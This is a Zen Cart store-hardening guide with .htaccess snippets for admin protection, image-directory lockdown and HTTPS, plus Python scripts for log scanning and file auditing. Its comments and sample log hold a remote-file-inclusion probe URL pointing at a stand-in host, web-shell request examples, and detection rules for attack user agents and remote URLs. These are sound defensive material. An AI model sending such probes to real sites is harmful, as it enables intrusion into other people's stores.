Helpful Security Extras for Zen Cart


Zen Cart Security

First and foremost, make sure your Zen Cart is fully patched! No exceptions. Even the Zen Cart you just downloaded and installed still needs the published security patches applied.

Now, work through the items on Zen Cart’s recommended security list, but skip the two .htaccess snippets quoted below. If you apply them, robots.txt (and every other .txt file) can no longer be fetched, and because every Zen Cart page is a .php file, the <Files *.php> block stops the store itself from loading in most server environments.

# .htaccess to prevent unauthorized directory browsing or access to .php files
IndexIgnore */*
<Files *.php>
Order Deny,Allow
Deny from all
</Files>

# add the following to protect against people discovering what version your spiders.txt file is
<Files *.txt>
Order Deny,Allow
Deny from all
</Files>

Now, let’s add some cool stuff to help you stay safe.

Tip #1: Use strong, unique passwords for everything: the hosting control panel, FTP, the database, and every Zen Cart admin account. Change them every 30 days, and immediately whenever an admin leaves or you suspect a compromise.

Tip #2: When renaming your admin directory, DO NOT use any admin- or business-related term. An unrelated word such as banana is fine; names like manage, control, or anything ending in admin (XXadmin) are the first guesses anyone hunting for your admin directory will try.

Tip #3: Make sure every admin has their OWN account, and install this module to track their access more conveniently.

Tip #4: Protect your admin directory with an additional layer of authentication when possible: password-protect the directory with HTTP Basic auth (a .htpasswd file), restrict it to known IP addresses, or both. Both can be done from a .htaccess file placed inside the admin directory, as in the example below.

# password-protect the directory (create the .htpasswd file with the htpasswd tool and keep it outside the web root)
AuthType Basic
AuthName "This directory is protected"
AuthUserFile /home/path/.htpasswd
AuthGroupFile /dev/null
Require valid-user

# deny all except the listed sources; left outside a <Limit> block so it applies to every request
# method (a <Limit GET POST PUT> block leaves any other method unrestricted)
Order Deny,Allow
Deny from all
Allow from 192.168.1.1
# "Allow from" takes an IP address, a CIDR range or a hostname suffix, never a regular expression;
# hostname matching needs reverse DNS (HostnameLookups) and is slower and less reliable than an address
Allow from domain.com
# With both blocks present Apache demands BOTH a password and a listed source (Satisfy All);
# change to "Satisfy Any" if either one on its own should be enough
Satisfy All
# Apache 2.4 replaces Order/Deny/Allow with "Require ip 192.168.1.1" inside <RequireAll> or <RequireAny>

Tip #5: Put an index.html file in every directory so that none of them can be browsed. The file can be blank; its only job is to stop Apache from generating a directory listing. Any file named in the server’s DirectoryIndex setting (index.html or index.php on most hosts) does the job, and Options -Indexes in .htaccess does the same for a whole tree where the host allows it.

Tip #6: Protect all of your images directories with the following .htaccess to prevent browsing, direct execution of PHP files, and the crude remote-inclusion probes it filters. These directories also need an index file (Tip #5). When done, log in to your hosting control panel and change the permissions on both the index.html and the .htaccess file to 444 so they cannot be modified. Note that 444 is a speed bump rather than a guarantee: anything running as the file owner (including PHP itself on a suPHP host) can chmod the file back, so it protects against accidental edits and unprivileged automated tampering only.

# PRO-Webs ver 1.8 1/2010
# Prevent directory viewing and the ability of any scripts to run.
# While a bit of overkill, this file prevents a wide array of access and execution
# of known exploits in your Zen Cart.
# This file and an index.html should be chmod 444.
# The lowest permission a host accepts differs from server to server; set it as
# low as possible and no higher than 644.
# Permissions this low will likely need to be set in the host's file manager.
# Place this in all images directories except BMZ_Cache.
# (Options requires "AllowOverride Options" from the host; if this line causes a 500 error, remove it.)
Options -ExecCGI -Indexes
IndexIgnore *
RewriteEngine On
# Refuse the libwww-perl user agent (used by many automated exploit scripts) ...
RewriteCond %{HTTP_USER_AGENT} libwww [NC,OR]
# ... and any query string with a parameter whose value starts with "http"
# (the remote-file-inclusion pattern, e.g. ?page=http://evil.example/shell.txt)
RewriteCond %{QUERY_STRING} ^(.*)=http [NC]
RewriteRule ^(.*)$ - [F,L]
# Never serve this file itself
<Files .htaccess>
Order Allow,Deny
Deny from all
</Files>
# Refuse direct requests for script files under any common PHP extension
# (Deny only blocks HTTP requests; a file included by other PHP code still runs)
<Files ~ "\.(php\d?|phtml|phar)$">
Order Allow,Deny
Deny from all
</Files>
# Finally chmod this .htaccess (and the directory's index.html) to 444
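To see what those three rules actually refuse, here is an added example (not code from the original post or from Zen Cart) that applies the same checks to Apache combined-format access-log lines. The four log lines embedded in it are constructed for the demo, with addresses from documentation ranges; the /images/ prefix and the script-extension list mirror the .htaccess above. It doubles as a way to grep your own logs for the probes that file is aimed at.

```python
"""Scan web-server access-log lines for the three things the images .htaccess refuses.

Added example for this post (not the post author's or Zen Cart's code). It assumes
Apache's combined log format; the log lines embedded below are constructed.
"""
from __future__ import annotations

import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Apache "combined" log format: ip ident user [ts] "METHOD target PROTO" status size "referer" "ua"
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# Same extension list as the <Files> block: plain .php plus the variants hosts sometimes map to PHP
SCRIPT_RE = re.compile(r"\.(php\d?|phtml|phar)$", re.IGNORECASE)

# Directory trees the .htaccess is placed in (Tip #6 says "all images directories")
PROTECTED_PREFIXES = ("/images/",)


def classify(line: str) -> list[str]:
    """Return the reasons the images .htaccess would refuse this request (empty list = it passes)."""
    m = LOG_RE.match(line)
    if m is None:
        return ["unparsed log line"]
    reasons: list[str] = []
    # RewriteCond %{HTTP_USER_AGENT} libwww [NC]
    if "libwww" in m["ua"].lower():
        reasons.append("libwww user agent")
    # RewriteCond %{QUERY_STRING} ^(.*)=http [NC]: some parameter value begins with "http".
    # parse_qsl URL-decodes first, so this also catches a %3D-encoded "=" that the raw regex misses.
    url = urlsplit(m["target"])
    for key, value in parse_qsl(url.query, keep_blank_values=True):
        if value.lower().startswith("http"):
            reasons.append(f"remote URL in parameter {key!r}")
            break
    # <Files ~ "\.(php\d?|phtml|phar)$"> Deny from all, inside the images tree
    path = unquote(url.path)
    if path.startswith(PROTECTED_PREFIXES) and SCRIPT_RE.search(path):
        reasons.append("script requested inside an images directory")
    return reasons


def scan(log_text: str) -> list[tuple[str, str, list[str]]]:
    """Return (client ip, request target, reasons) for every line that would be refused."""
    flagged = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        reasons = classify(line)
        if reasons:
            m = LOG_RE.match(line)
            flagged.append((m["ip"] if m else "?", m["target"] if m else line, reasons))
    return flagged


# Constructed sample: two ordinary hits, one probe for an uploaded shell, one RFI attempt via libwww-perl
SAMPLE_LOG = """\
203.0.113.5 - - [10/Jan/2010:10:00:01 -0500] "GET /index.php?main_page=product_info&products_id=12 HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Jan/2010:10:00:02 -0500] "GET /images/uploads/c99.php HTTP/1.1" 403 211 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Jan/2010:10:00:03 -0500] "GET /index.php?main_page=http://evil.example/shell.txt? HTTP/1.1" 403 211 "-" "libwww-perl/5.805"
203.0.113.5 - - [10/Jan/2010:10:00:04 -0500] "GET /images/logo.gif HTTP/1.1" 200 3210 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for ip, target, reasons in scan(SAMPLE_LOG):
        print(f"{ip} {target} -> {', '.join(reasons)}")
```

Run it against a real log with `scan(open("access_log").read())`; a flagged line whose status is 200 rather than 403 means the request got through, which is the case worth investigating.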

Tip #7: If you have an SSL certificate, force all of your admin pages to load over HTTPS with the following .htaccess code, placed in the site’s root .htaccess. Also make sure ENABLE_SSL_ADMIN is set to 'true' in admin/includes/configure.php so that Zen Cart itself generates https:// admin links instead of relying on the redirect.

RewriteEngine On
# Redirect only when the request did not already arrive over TLS. %{HTTPS} is set by mod_ssl;
# testing SERVER_PORT 80 instead breaks on non-standard ports. If your host terminates TLS on a
# proxy, test %{HTTP:X-Forwarded-Proto} !https here instead or you will get a redirect loop.
RewriteCond %{HTTPS} !=on
# In the root .htaccess the captured path already starts with admin_dir/, so do not repeat it in the target
RewriteRule ^(admin_dir/.*)$ https://domain.com/$1 [R=301,L]

Tip #8: Make sure your cache folder still has the index.php and .htaccess files that ship with Zen Cart. Download a fresh copy of Zen Cart and upload its cache/index.php and cache/.htaccess to be sure, then CHMOD both to 444.
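A quick audit of the file-system items in Tips #2, #5, #6 and #8, as an added example for this post (not Zen Cart’s own tooling or the post author’s code). It assumes a stock layout (an images/ tree, a cache/ directory, one renamed admin directory) on a Unix host where mode 0444 means read-only for everyone; build_sample_tree() is a helper that creates a constructed, deliberately half-hardened store in a temp directory so the audit runs offline.

```python
"""Audit a Zen Cart document root for the hardening items in Tips #2, #5, #6 and #8.

Added example for this post (not Zen Cart's or the post author's code). It assumes a stock
layout (images/, cache/, one renamed admin directory) on a Unix host.
"""
from __future__ import annotations

import shutil
import stat
import tempfile
from pathlib import Path

# Words that make an admin directory easy to guess (Tip #2)
GUESSABLE_ADMIN_WORDS = ("admin", "manage", "control", "backend")
# Any of these stops a directory listing under the usual DirectoryIndex setting (Tip #5)
INDEX_NAMES = ("index.html", "index.htm", "index.php")
# Files that should be read-only once in place (Tips #6 and #8)
READ_ONLY_NAMES = (".htaccess", "index.html", "index.php")
# Extensions that must never appear inside an images directory
SCRIPT_SUFFIXES = (".php", ".php5", ".php7", ".phtml", ".phar")

WRITE_BITS = stat.S_IWUSR | stat.S_IWGRP | stat.S_IWOTH


def is_read_only(path: Path) -> bool:
    """True when no write bit is set, which is what chmod 444 produces."""
    return (path.stat().st_mode & WRITE_BITS) == 0


def audit_admin(root: Path, admin_dir: str) -> list[str]:
    """Tip #2 (guessable name) and Tip #4 (no extra .htaccess layer in the admin directory)."""
    findings = []
    if any(word in admin_dir.lower() for word in GUESSABLE_ADMIN_WORDS):
        findings.append(f"admin directory {admin_dir!r} contains a guessable word")
    if not (root / admin_dir / ".htaccess").is_file():
        findings.append(f"{admin_dir}/.htaccess missing (no extra authentication layer)")
    return findings


def audit_index_files(root: Path) -> list[str]:
    """Tip #5: every directory below the root needs an index file."""
    findings = []
    for d in sorted(p for p in root.rglob("*") if p.is_dir()):
        if not any((d / name).is_file() for name in INDEX_NAMES):
            findings.append(f"{d.relative_to(root)}/ has no index file (listing possible)")
    return findings


def audit_images(root: Path) -> list[str]:
    """Tip #6: every images directory except bmz_cache needs a read-only .htaccess and index, and no scripts."""
    findings = []
    images = root / "images"
    if not images.is_dir():
        return ["images/ directory not found"]
    for d in [images] + sorted(p for p in images.rglob("*") if p.is_dir()):
        if d.name.lower() == "bmz_cache":
            continue
        rel = d.relative_to(root)
        if not (d / ".htaccess").is_file():
            findings.append(f"{rel}/.htaccess missing")
        for name in READ_ONLY_NAMES:
            f = d / name
            if f.is_file() and not is_read_only(f):
                findings.append(f"{rel}/{name} is writable (expected mode 0444)")
        for f in sorted(d.iterdir()):
            if f.is_file() and f.suffix.lower() in SCRIPT_SUFFIXES:
                findings.append(f"{rel}/{f.name}: script file inside an images directory")
    return findings


def audit_cache(root: Path) -> list[str]:
    """Tip #8: cache/ must carry Zen Cart's index.php and .htaccess, both read-only."""
    findings = []
    for name in (".htaccess", "index.php"):
        f = root / "cache" / name
        if not f.is_file():
            findings.append(f"cache/{name} missing")
        elif not is_read_only(f):
            findings.append(f"cache/{name} is writable (expected mode 0444)")
    return findings


def audit(root: str | Path, admin_dir: str) -> list[str]:
    root = Path(root)
    return audit_admin(root, admin_dir) + audit_index_files(root) + audit_images(root) + audit_cache(root)


def build_sample_tree() -> Path:
    """Constructed store: images/ hardened, images/large/ not, cache/.htaccess left writable, admin 'myadmin'."""
    root = Path(tempfile.mkdtemp(prefix="zencart-audit-"))

    def put(path: Path, mode: int, text: str = "") -> None:
        path.parent.mkdir(parents=True, exist_ok=True)
        path.write_text(text)
        path.chmod(mode)

    put(root / "images" / "index.html", 0o444)
    put(root / "images" / ".htaccess", 0o444, "Options -Indexes\n")
    put(root / "images" / "large" / "shell.php", 0o644, "<?php ?>")  # no index, no .htaccess, a script
    put(root / "cache" / "index.php", 0o444, "<?php ?>")
    put(root / "cache" / ".htaccess", 0o644, "Deny from all\n")  # right content, wrong mode
    put(root / "myadmin" / "index.php", 0o644, "<?php ?>")
    return root


if __name__ == "__main__":
    sample = build_sample_tree()
    try:
        for finding in audit(sample, "myadmin"):
            print(finding)
    finally:
        shutil.rmtree(sample)
```

Point `audit()` at your real document root (`audit("/home/user/public_html", "banana")`) and fix anything it lists; an empty result means every item from these tips is in place, not that the store is secure in general.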

I may be adding to this, as we are always testing… so stay tuned.

